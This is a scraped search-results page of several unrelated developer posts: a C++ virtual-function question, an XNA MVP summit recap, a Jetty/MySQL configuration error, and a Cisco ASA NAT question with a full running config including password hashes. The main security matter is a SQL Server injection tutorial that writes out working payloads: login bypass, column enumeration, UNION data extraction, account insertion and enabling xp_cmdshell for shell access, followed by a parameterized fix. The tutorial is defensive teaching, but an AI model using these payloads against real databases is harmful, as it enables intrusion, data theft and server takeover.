Search Results

Search found 1685 results on 68 pages for 'no more guessing'.

Page 67/68 | < Previous Page | 63 64 65 66 67 68  | Next Page >

  • How to call virtual function of an object in C++

    - by SoonDead
    I'm struggling with calling a virtual function in C++. I'm not experienced in C++, I mainly use C# and Java so I might have some delusions, but bear with me. I have to write a program where I have to avoid dynamic memory allocation if possible. I have made a class called List: template <class T> class List { public: T items[maxListLength]; int length; List() { length = 0; } T get(int i) const { if (i >= 0 && i < length) { return items[i]; } else { throw "Out of range!"; } }; // set the value of an already existing element void set(int i, T p) { if (i >= 0 && i < length) { items[i] = p; } else { throw "Out of range!"; } } // returns the index of the element int add(T p) { if (length >= maxListLength) { throw "Too many points!"; } items[length] = p; return length++; } // removes and returns the last element; T pop() { if (length > 0) { return items[--length]; } else { throw "There is no element to remove!"; } } }; It just makes an array of the given type, and manages the length of it. There is no need for dynamic memory allocation, I can just write: List<Object> objects; MyObject obj; objects.add(obj); MyObject inherits form Object. Object has a virtual function which is supposed to be overridden in MyObject: struct Object { virtual float method(const Input& input) { return 0.0f; } }; struct MyObject: public Object { virtual float method(const Input& input) { return 1.0f; } }; I get the elements as: objects.get(0).method(asdf); The problem is that even though the first element is a MyObject, the Object's method function is called. I'm guessing there is something wrong with storing the object in an array of Objects without dynamically allocating memory for the MyObject, but I'm not sure. Is there a way to call MyObject's method function? How? It's supposed to be a heterogeneous collection btw, so that's why the inheritance is there in the first place. If there is no way to call the MyObject's method function, then how should I make my list in the first place?

    Read the article

  • MVP Summit 2011 summary and thoughts: The &ldquo;I hope I don&rsquo;t cross a line and lose my MVP status&rdquo; post

    - by George Clingerman
    I've been wanting to write this post summarizing my thoughts about the MVP summit but have been dragging my feet since it's a very difficult one to write. However seeing Andy (http://forums.create.msdn.com/forums/t/77625.aspx) and Catalin (http://www.catalinzima.com/2011/03/mvp-summit-2011/) and Chris (http://geekswithblogs.net/cwilliams/archive/2011/03/07/144229.aspx) post about it has encouraged me to finally take the plunge. I'm going to have to write carefully though because I'm going to be dancing around a ton of NDA mine fields as well as having to walk the tight-rope of not sending the wrong message or having people read too much into what I'm saying. I want to note that most of what I'm about to say is just based on my observations, they're not thoughts that Microsoft has asked me to pass along and they're not things I heard Microsoft say. It's just me sharing what I think after going to the MVP summit. Let's start off with a short imaginary question and answer session.     Has the App Hub forums and XBLIG management been rather poor by Microsoft? Yes.     Do I think we're going to see changes to that overnight? No.     Will it continue to look bad from the outside? Somewhat. Confusing right? Well that's kind of how things are right now. Lots of confusion. XNA is doing AWESOME. Like, really, really awesome. As a result of that awesomeness, XNA is on three major platforms: Xbox 360, WP7 and PC. This means that internally Microsoft is really excited and invested in the technology. That's fantastic for XNA and really should show you the future the framework has. It's here to stay. So why are Xbox LIVE Indie Game developers feeling so much pain? The ironic thing is that pain is being caused by the success of XNA. When XNA was just a small thing, there was more freedom and more focus. It was just us and them. We were an only child. Now our family has grown and everyone has and wants some time with XNA. This gets XNA pulled in all directions and as it moves onto new platforms, it plays catch up trying to get those platforms up to speed to where Xbox LIVE Indie Games has grown. Forums, documentation, educational content. They all need to be there because Xbox LIVE Indie Games has all of that and more. Along with the catch up in features/documentation/awesomeness there's the catch up that the people on the team have to play. New platforms and new areas of development mean new players and those new guys don't have the history of being around from the beginning. This leads to a lack of understanding at times just how important some things are because they seem so small and insignificant (Rich Text defaulting for new forum profiles would be one things that jumps to mind). If you're not aware that the forums have become more than just a basic Q&A, if you're not aware that they're a central hub to a very active community, then you don't understand why that small change should be prioritized over something else. New people have to get caught up and figure out how to make a framework and central forum site work for everyone it's now serving. So yeah, a lot of our pain this last year has been simply that XNA is doing well and XBLIG is doing well so the focus was shifted to catch other things up. It hurts when a parent seems to not have any time for you and they're spending some much time with your new baby brother. Growing pains. All families and in our case our product family experience it to some degree. I think as WP7 matures we'll see the team figuring out how to give everyone the right amount of attention. While we're talking about some of our growing pains, it is also important to note (although not really an excuse) that the Xbox LIVE Arcade developers complain about many of the same things that we do. If you paid attention to talks and information coming out of GDC 2011, most of the the XBLA guys were saying things that sounded eerily similar to what the XBLIG developers are saying (Scott Nichols from GayGamer.net noticed http://twitter.com/#!/NaviFairyGG/status/43540379206811650). Does this mean we should just accept the status quo since we're being treated exactly the same? No way. However it DOES show that the way we're being treated is no indication of the stability and future of the platform, it's just Microsoft dropping the communication ball on two playing fields. We're not alone and we're not even being treated worse. Not great, but also in a weird way a very good sign. Now on to a few tidbits I think I CAN share from the summit (I'm really crossing my fingers I'm not stepping over some NDA line I shouldn't be). First, I discovered that the XBLIG user base is bigger than I personally had originally estimated. I won't give the exact numbers (although we did beg Microsoft to release some of these numbers so maybe someday?) but it was much larger than my original guestimates and I was pleasantly surprised. Maybe some of you guys had the right number when you were guessing, but I know that mine was much too low. And even MORE importantly the number of users/shoppers is growing at a steady pace as well. Our market is growing! That was fantastic news and really something that I had to share. On to the community manager discussion. It was mentioned. I was mentioned. I blushed. Nothing more to report there than the blush in my cheeks was a light crimson color. If I ever see a job description posted for that position I have a resume waiting in the wings. I can't deny that I think that would be my dream job... ...so after I finished blushing, the MVPs did make it very, very clear that the communication has to improve. Community manager or not the single biggest pain point with the Xbox LIVE Indie Game community has been a lack of communication. I have seen dramatic improvement in the team responding to MVPs and I'm even seeing more communication from them on the forums so I'm hoping that's a long term change. I really think they understood the issue, the problem remains how to open that communication channel in a way that was sustainable. I think they'll get it figured out and hopefully that's sooner rather than later. During the summit, you may have seen me tweeting about how I was "that guy" (http://twitter.com/#!/clingermangw/status/42740432471470081). You also may have noticed that Andy and Catalin both mentioned me in their summit write ups. I may have come on a bit strong while I was there...went a little out of character for myself. I've been agitated for a while with the way things have been and I've been listening to you guys and hearing you guys be agitated. I'm also watching some really awesome indie game developers looking elsewhere and leaving the platform. Some of them we might not have been able to keep even with changes, but others are only leaving because of perceptions and lack of communication from Microsoft. And that pisses me off. And I let Microsoft know that I was pissed off. You made your list and I took that list and verbalized it. I verbalized the hell out of it. [It was actually mentioned that I'm a lot nicer on the forums and in email than I am in person...I felt bad about that, but I couldn't stay silent]. Hopefully it did something guys, I really did try hard to get the message across. Along with my agitation, I also brought some pride. I mentioned several things in person to the team that I was particularly proud of. From people in the community that are doing an awesome job, to the re-launch of XboxIndies that was going on that week and even gamers like Steven Hurdle (http://writingsofmassdeduction.com/) who have purchased one XBLIG every day for over 100 days now. The community is freaking rocking it and I made sure to highlight that. So in conclusion, I'd just like to say hang in there (you know, like that picture of the cat). If you've been worried about investing in Xbox LIVE Indie Games because you think it's on shaky ground. It's not. Dream Build Play being about the Xbox 360 should have helped a little to point that out. The team is really scrambling around trying to figure things out and make improvements all around. There’s quite a few new gals and guys and it's going to take them time to catch up and there are a lot of constantly shifting priorities. We all have one toy, one team and we're fighting for time with it. It's also time for the community to continue spreading our wings and going out on our own more often. The Indie Game Winter Uprising was a fantastic example of that. We took things into our own hands and it got noticed and Microsoft got behind it. They do every time we stand up and do something (look at how many Microsoft employees tweeted, wrote about the re-launch of XboxIndies.com or the support I've gotten from them for my weekly XNA Notes). XNA is here to stay, it's time for us to stop being scared of that and figure out how to make our own games the successes they should be. There's definitely a list of things that need to be fixed, things that should be improved and I think we should definitely keep vocal about that with Microsoft. Keep it short, focused and prioritized. There's also a lot of things we can do ourselves while we're waiting on them to fix and change things. Lots of ways we can compensate for particular weaknesses in the channel. The kind of stuff that we can step up and do ourselves. Do it on our own, you know, the way Indies always do. And I'm really looking forward to watching us do just that.

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • Jetty 7 + MySQL Config [java.lang.ClassNotFoundException: org.mortbay.jetty.webapp.WebAppContext]

    - by Scott Chang
    I've been trying to get a c3p0 db connection pool configured for Jetty, but I keep getting a ClassNotFoundException: 2010-03-14 19:32:12.028:WARN::Failed startup of context WebAppContext@fccada@fccada/phpMyAdmin,file:/usr/local/jetty/webapps/phpMyAdmin/,file:/usr/local/jetty/webapps/phpMyAdmin/ java.lang.ClassNotFoundException: org.mortbay.jetty.webapp.WebAppContext at java.net.URLClassLoader$1.run(URLClassLoader.java:200) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(URLClassLoader.java:188) at java.lang.ClassLoader.loadClass(ClassLoader.java:307) at java.lang.ClassLoader.loadClass(ClassLoader.java:252) at org.eclipse.jetty.webapp.WebAppClassLoader.loadClass(WebAppClassLoader.java:313) at org.eclipse.jetty.webapp.WebAppClassLoader.loadClass(WebAppClassLoader.java:266) at org.eclipse.jetty.util.Loader.loadClass(Loader.java:90) at org.eclipse.jetty.xml.XmlConfiguration.nodeClass(XmlConfiguration.java:224) at org.eclipse.jetty.xml.XmlConfiguration.configure(XmlConfiguration.java:187) at org.eclipse.jetty.webapp.JettyWebXmlConfiguration.configure(JettyWebXmlConfiguration.java:77) at org.eclipse.jetty.webapp.WebAppContext.startContext(WebAppContext.java:975) at org.eclipse.jetty.server.handler.ContextHandler.doStart(ContextHandler.java:586) at org.eclipse.jetty.webapp.WebAppContext.doStart(WebAppContext.java:349) at org.eclipse.jetty.util.component.AbstractLifeCycle.start(AbstractLifeCycle.java:55) at org.eclipse.jetty.server.handler.HandlerCollection.doStart(HandlerCollection.java:165) at org.eclipse.jetty.server.handler.ContextHandlerCollection.doStart(ContextHandlerCollection.java:162) at org.eclipse.jetty.util.component.AbstractLifeCycle.start(AbstractLifeCycle.java:55) at org.eclipse.jetty.server.handler.HandlerCollection.doStart(HandlerCollection.java:165) at org.eclipse.jetty.util.component.AbstractLifeCycle.start(AbstractLifeCycle.java:55) at org.eclipse.jetty.server.handler.HandlerWrapper.doStart(HandlerWrapper.java:92) at org.eclipse.jetty.server.Server.doStart(Server.java:228) at org.eclipse.jetty.util.component.AbstractLifeCycle.start(AbstractLifeCycle.java:55) at org.eclipse.jetty.xml.XmlConfiguration$1.run(XmlConfiguration.java:990) at java.security.AccessController.doPrivileged(Native Method) at org.eclipse.jetty.xml.XmlConfiguration.main(XmlConfiguration.java:955) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) at java.lang.reflect.Method.invoke(Method.java:597) at org.eclipse.jetty.start.Main.invokeMain(Main.java:394) at org.eclipse.jetty.start.Main.start(Main.java:546) at org.eclipse.jetty.start.Main.parseCommandLine(Main.java:208) at org.eclipse.jetty.start.Main.main(Main.java:75) I'm new to Jetty and I want to ultimately get phpMyAdmin and WordPress to run on it through Quercus and a JDBC connection. Here are my web.xml and jetty-web.xml files in my WEB-INF directory. jetty-web.xml: <?xml version="1.0"?> <!DOCTYPE Configure PUBLIC "-//Mort Bay Consulting//DTD Configure//EN" "http://jetty.mortbay.org/configure.dtd"> <Configure class="org.mortbay.jetty.webapp.WebAppContext"> <New id="mysql" class="org.mortbay.jetty.plus.naming.Resource"> <Arg>jdbc/mysql</Arg> <Arg> <New class="com.mchange.v2.c3p0.ComboPooledDataSource"> <Set name="Url">jdbc:mysql://localhost:3306/mysql</Set> <Set name="User">user</Set> <Set name="Password">pw</Set> </New> </Arg> </New> </Configure> web.xml: <?xml version="1.0"?> <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN" "http://java.sun.com/j2ee/dtds/web-app_2_2.dtd"> <web-app> <description>Caucho Technology's PHP Implementation</description> <resource-ref> <description>My DataSource Reference</description> <res-ref-name>jdbc/mysql</res-ref-name> <res-type>javax.sql.DataSource</res-type> <res-auth>Container</res-auth> </resource-ref> <servlet> <servlet-name>Quercus Servlet</servlet-name> <servlet-class>com.caucho.quercus.servlet.QuercusServlet</servlet-class> <!-- Specifies the encoding Quercus should use to read in PHP scripts. --> <init-param> <param-name>script-encoding</param-name> <param-value>UTF-8</param-value> </init-param> <!-- Tells Quercus to use the following JDBC database and to ignore the arguments of mysql_connect(). --> <init-param> <param-name>database</param-name> <param-value>jdbc/mysql</param-value> </init-param> <init-param> <param-name>ini-file</param-name> <param-value>WEB-INF/php.ini</param-value> </init-param> </servlet> <servlet-mapping> <servlet-name>Quercus Servlet</servlet-name> <url-pattern>*.php</url-pattern> </servlet-mapping> <welcome-file-list> <welcome-file>index.php</welcome-file> </welcome-file-list> </web-app> I'm guessing that I'm missing a few jars or something. Currently I have placed the following jars in my WEB-INF/lib directory: c3p0-0.9.1.2.jar commons-dbcp-1.4.jar commons-pool-1.5.4.jar mysql-connector-java-5.1.12-bin.jar I have also tried to put these jars in JETTY-HOME/lib/ext, but to no avail... Someone please tell me what is wrong with my configuration. I'm sick of digging through Jetty's crappy documentation.

    Read the article

  • Creating static NAT blocks outbound traffic Cisco ASA

    - by natediggs
    Hi Everyone, I have two web servers sitting behind a Cisco ASA 5505, which I don't have much experience with. I'm trying to create two static NATs. One static NAT that goes to xx.xx.xx.150 and another that goes to xx.xx.xx.151. I've created the static NAT for the .150 web server and it works FINE. Incoming and outgoing traffic work great. This is the staging web server. I now need to duplicate the setup for the production web server. So, I connect the webserver to the firewall, change the public IP address on one of the NICs reboot the server and I have outbound internet access. Then I run the command: static (inside,outside) xx.xx.xx.150 192.168.1.x which is successful. I then run the command: access-list acl-outside permit tcp any host xx.xx.xx.150 eq 80 Which is successful. I then try to browse the internet and I get nothing. I try to telnet in through port 80 and I get nothing (though I'm guessing because the response to the telnet request is being blocked). I've tried this with the production web server and then I tried it with another web server that is for internal testing and have the exact same problem. Both work fine until I run the static NAT rule and then no outbound internet access. I have a feeling that it's something simple that I'm missing, but my limited experience with this device is killing me. Below I've pasted the current configuration. I'm currently trying to get this to work on the .153 server which is the internal testing server. Once I can verify that works, I'll try it with production. : Saved : ASA Version 8.2(4) ! hostname QG domain-name XX.com enable password passwd names ! interface Ethernet0/0 switchport access vlan 2 ! interface Ethernet0/1 ! interface Ethernet0/2 ! interface Ethernet0/3 ! interface Ethernet0/4 ! interface Ethernet0/5 ! interface Ethernet0/6 ! interface Ethernet0/7 ! interface Vlan1 nameif inside security-level 100 ip address 192.168.1.1 255.255.255.0 ! interface Vlan2 nameif outside security-level 0 ip address XX.XX.XX.148 255.255.255.0 ! interface Vlan3 shutdown no forward interface Vlan1 nameif dmz security-level 50 ip address dhcp ! boot system disk0:/asa824.bin ftp mode passive clock timezone EST -5 clock summer-time EDT recurring dns server-group DefaultDNS domain-name fw.XXgroup.com same-security-traffic permit inter-interface access-list acl-outside extended permit tcp any host XX.XX.XX.150 eq www access-list acl-outside extended permit tcp any host XX.XX.XX.150 eq https access-list acl-outside extended permit tcp any host XX.XX.XX.151 eq www access-list acl-outside extended permit tcp any host XX.XX.XX.151 eq https access-list acl-outside extended permit tcp any host XX.XX.XX.153 eq www access-list inside_access_in extended permit ip 192.168.1.0 255.255.255.0 any access-list inside_nat0_outbound extended permit ip any 192.168.1.32 255.255.255.240 pager lines 24 logging enable logging asdm informational mtu inside 1500 mtu outside 1500 mtu dmz 1500 ip local pool VPNIPs 192.168.1.35-192.168.1.44 mask 255.255.255.0 icmp unreachable rate-limit 1 burst-size 1 asdm image disk0:/asdm-635.bin no asdm history enable arp timeout 14400 global (outside) 1 interface nat (inside) 0 access-list inside_nat0_outbound nat (inside) 1 0.0.0.0 0.0.0.0 static (inside,outside) XX.XX.XX150 192.168.1.100 netmask 255.255.255.255 static (inside,outside) XX.XX.XX153 192.168.1.102 netmask 255.255.255.255 access-group acl-outside in interface outside route outside 0.0.0.0 0.0.0.0 XX.XX.XX129 1 timeout xlate 3:00:00 timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02 timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00 timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00 timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute timeout tcp-proxy-reassembly 0:01:00 dynamic-access-policy-record DfltAccessPolicy aaa authorization command LOCAL http server enable http 192.168.1.0 255.255.255.0 inside http 0.0.0.0 0.0.0.0 outside no snmp-server location no snmp-server contact snmp-server enable traps snmp authentication linkup linkdown coldstart crypto ipsec transform-set ESP-3DES-SHA esp-3des esp-sha-hmac crypto ipsec security-association lifetime seconds 28800 crypto ipsec security-association lifetime kilobytes 4608000 crypto dynamic-map outside_dyn_map 20 set pfs group1 crypto dynamic-map outside_dyn_map 20 set transform-set ESP-3DES-SHA crypto map outside_map 65535 ipsec-isakmp dynamic outside_dyn_map crypto map outside_map interface outside crypto isakmp enable outside crypto isakmp policy 10 authentication crack encryption 3des hash sha group 2 lifetime 86400 no crypto isakmp nat-traversal client-update enable telnet timeout 5 ssh timeout 5 console timeout 0 dhcpd auto_config outside ! dhcpd address 192.168.1.2-192.168.1.33 inside dhcpd dns 208.77.88.4 interface inside dhcpd enable inside ! threat-detection basic-threat threat-detection statistics access-list no threat-detection statistics tcp-intercept webvpn enable outside svc image disk0:/sslclient-win-1.1.0.154.pkg 1 svc image disk0:/anyconnect-win-2.5.2019-k9.pkg 2 svc enable group-policy ATSAdmin internal group-policy ATSAdmin attributes dns-server value 208.77.88.4 208.85.174.9 vpn-tunnel-protocol IPSec svc webvpn webvpn url-list none svc keep-installer installed svc rekey method ssl svc ask enable username qgadmin password /oHfeGQ/R.bd3KPR encrypted privilege 15 username benl password 0HNIGQNI0uruJvhW encrypted privilege 0 username benl attributes vpn-group-policy ATSAdmin username kuzma password rH7MM7laoynyvf9U encrypted privilege 0 username kuzma attributes vpn-group-policy ATSAdmin username nate password BXHOURyT37e4O5mt encrypted privilege 0 username nate attributes vpn-group-policy ATSAdmin tunnel-group ATSAdmin type remote-access tunnel-group ATSAdmin general-attributes address-pool VPNIPs default-group-policy ATSAdmin tunnel-group SSLVPN type remote-access tunnel-group SSLVPN general-attributes address-pool VPNIPs default-group-policy ATSAdmin ! class-map inspection_default match default-inspection-traffic ! ! policy-map type inspect dns preset_dns_map parameters message-length maximum 512 policy-map global_policy class inspection_default inspect dns preset_dns_map inspect ftp inspect h323 h225 inspect h323 ras inspect rsh inspect rtsp inspect esmtp inspect sqlnet inspect skinny inspect sunrpc inspect xdmcp inspect sip inspect netbios inspect tftp inspect ip-options ! service-policy global_policy global privilege cmd level 3 mode exec command perfmon privilege cmd level 3 mode exec command ping privilege cmd level 3 mode exec command who privilege cmd level 3 mode exec command logging privilege cmd level 3 mode exec command failover privilege show level 5 mode exec command running-config privilege show level 3 mode exec command reload privilege show level 3 mode exec command mode privilege show level 3 mode exec command firewall privilege show level 3 mode exec command interface privilege show level 3 mode exec command clock privilege show level 3 mode exec command dns-hosts privilege show level 3 mode exec command access-list privilege show level 3 mode exec command logging privilege show level 3 mode exec command ip privilege show level 3 mode exec command failover privilege show level 3 mode exec command asdm privilege show level 3 mode exec command arp privilege show level 3 mode exec command route privilege show level 3 mode exec command ospf privilege show level 3 mode exec command aaa-server privilege show level 3 mode exec command aaa privilege show level 3 mode exec command crypto privilege show level 3 mode exec command vpn-sessiondb privilege show level 3 mode exec command ssh privilege show level 3 mode exec command dhcpd privilege show level 3 mode exec command vpn privilege show level 3 mode exec command blocks privilege show level 3 mode exec command uauth privilege show level 3 mode configure command interface privilege show level 3 mode configure command clock privilege show level 3 mode configure command access-list privilege show level 3 mode configure command logging privilege show level 3 mode configure command ip privilege show level 3 mode configure command failover privilege show level 5 mode configure command asdm privilege show level 3 mode configure command arp privilege show level 3 mode configure command route privilege show level 3 mode configure command aaa-server privilege show level 3 mode configure command aaa privilege show level 3 mode configure command crypto privilege show level 3 mode configure command ssh privilege show level 3 mode configure command dhcpd privilege show level 5 mode configure command privilege privilege clear level 3 mode exec command dns-hosts privilege clear level 3 mode exec command logging privilege clear level 3 mode exec command arp privilege clear level 3 mode exec command aaa-server privilege clear level 3 mode exec command crypto privilege cmd level 3 mode configure command failover privilege clear level 3 mode configure command logging privilege clear level 3 mode configure command arp privilege clear level 3 mode configure command crypto privilege clear level 3 mode configure command aaa-server prompt hostname context call-home profile CiscoTAC-1 no active destination address http https://tools.cisco.com/its/service/oddce/services/DDCEService destination address email [email protected] destination transport-method http subscribe-to-alert-group diagnostic subscribe-to-alert-group environment subscribe-to-alert-group 